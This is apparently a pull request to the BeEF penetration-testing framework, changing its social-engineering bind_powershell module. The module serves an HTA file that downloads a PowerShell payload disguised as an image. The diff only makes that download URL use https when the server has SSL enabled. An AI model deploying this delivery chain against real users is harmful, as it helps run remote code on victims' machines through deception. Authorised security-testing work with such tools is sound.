### PR TITLE
add https support to bind_powershell

### DIFF
--- a/extensions/social_engineering/powershell/bind_powershell.rb
+++ b/extensions/social_engineering/powershell/bind_powershell.rb
@@ -30,8 +30,9 @@ module BeEF
           response['Content-Type'] = "application/hta"
           host = BeEF::Core::Configuration.instance.get('beef.http.public') || BeEF::Core::Configuration.instance.get('beef.http.host')
           port = BeEF::Core::Configuration.instance.get('beef.http.public_port') || BeEF::Core::Configuration.instance.get('beef.http.port')
+          proto = BeEF::Core::Configuration.instance.get("beef.http.https.enable") == true ? "https" : "http"
           ps_url = BeEF::Core::Configuration.instance.get('beef.extension.social_engineering.powershell.powershell_handler_url')
-          payload_url = "http://#{host}:#{port}#{ps_url}/ps.png"
+          payload_url = "#{proto}://#{host}:#{port}#{ps_url}/ps.png"
 
           print_info "Serving HTA. Powershell payload will be retrieved from: #{payload_url}"
           "<script>


### PR DESCRIPTION
bind_powershell module has http protocol hard coded, preventing powershell_hta from being able to download the payload image from a beef instance which uses SSL. Change pulls protocol from the config file similar to other modules.